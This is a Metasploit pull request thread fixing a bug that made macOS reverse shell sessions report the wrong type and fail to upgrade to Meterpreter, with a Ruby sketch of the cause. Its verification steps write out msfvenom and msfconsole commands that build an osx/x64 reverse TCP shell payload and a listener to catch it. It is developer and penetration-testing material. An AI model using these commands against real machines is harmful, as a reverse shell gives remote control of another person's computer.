fix #10576, fix session upgrade HANDLE_TIMEOUT and upgrading osx shells#10584

Merged
busterb merged 2 commits into rapid7:master from timwr:fix_10576
Sep 6, 2018

timwr commented Sep 4, 2018

Verification

List the steps needed to make sure this thing works

  • msfvenom -p osx/x64/shell_reverse_tcp LHOST=HOST LPORT=4444 -f macho -o osxshell
  • msfconsole -qx "use exploit/multi/handler; set payload osx/x64/shell_reverse_tcp; set lhost HOST; set lport 4444; set ExitOnSession false; run -j"
  • Execute the macho to get a shell session
  • sessions -u 1 on the session
  • Verify you get a meterpreter session

I'm still working on why the upgrading of sessions is not working for osx/x64/shell_reverse_tcp, as it seems to work if you upgrade a python shell, python meterpreter, or native meterpreter session on osx.

timwr commented Sep 4, 2018

So the reason why the upgrade isn't happening is because cmd_exec on an osx/x64/shell_reverse_tcp session does nothing currently. For some reason these sessions are being reported as session.type basic:
Which means:
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/common.rb#L84
doesn't invoke session.shell_command_token.
I can fix this either by adding an else or when 'basic' clause to the case, e.g:
timwr@57e8454
or by ensuring that session.type is set to shell?

timwr commented Sep 4, 2018

I think #10448 had a merge conflict, and the def type function was removed (not to be confused with the def self.type function :trollface:).
Putting it back seems to fix the issue:

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type           Information  Connection
  --  ----  ----           -----------  ----------
  1         shell x64/osx               ...

Without the fix:

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type           Information  Connection
  --  ----  ----           -----------  ----------
  1         basic x64/osx               ...
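
The failure mode described in the two comments above, as an added Ruby sketch that is not part of this pull request or of Metasploit's code. The names `cmd_exec`, `shell_command_token` and `type` come from the thread, but their bodies are simplified; the classes `BaseSession`, `BrokenShell` and `FixedShell`, the `'basic'` default on the base class, and `cmd_exec_strict` are assumptions made for illustration.

```ruby
# Hypothetical stand-ins modelled on the thread; not Metasploit's own classes.
class BaseSession
  def self.type; 'basic'; end   # class-level type
  def type; 'basic'; end        # instance-level default
end

# State after the bad merge: only the class method is overridden, so
# instances still answer #type with the base class default.
class BrokenShell < BaseSession
  def self.type; 'shell'; end
  def shell_command_token(cmd); "ran: #{cmd}"; end
end

# State after the fix: the instance method is back.
class FixedShell < BrokenShell
  def type; self.class.type; end
end

# Dispatch with no else branch: an unmatched type returns nil silently.
def cmd_exec(session, cmd)
  case session.type
  when 'meterpreter' then "meterpreter: #{cmd}"
  when 'shell'       then session.shell_command_token(cmd)
  end
end

# Same dispatch, but an unmatched type fails loudly instead of doing nothing.
def cmd_exec_strict(session, cmd)
  cmd_exec(session, cmd) ||
    raise(ArgumentError, "unsupported session type: #{session.type.inspect}")
end

if __FILE__ == $PROGRAM_NAME
  [BrokenShell, FixedShell].each do |klass|
    s = klass.new
    puts "#{klass}: class type=#{klass.type} instance type=#{s.type} " \
         "cmd_exec=#{cmd_exec(s, 'id').inspect}"
  end
end
```

The class-level and instance-level `type` methods are independent in Ruby, which is why removing one leaves the other intact and the mismatch only shows up at dispatch time.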

timwr changed the title from "fix #10576, fix session upgrade HANDLE_TIMEOUT" to "fix #10576, fix session upgrade HANDLE_TIMEOUT and upgrading osx shells" Sep 4, 2018
busterb self-assigned this Sep 5, 2018
busterb commented Sep 6, 2018

Looks good, thanks @timwr

acammack-r7 commented Sep 7, 2018

Release Notes

OS X command shells now have their session type set correctly to enable upgrading to native Meterpreter.

timwr mentioned this pull request Sep 12, 2018
tdoan-r7 added the rn-fix release notes fix label Sep 12, 2018

Labels

bug payload rn-fix release notes fix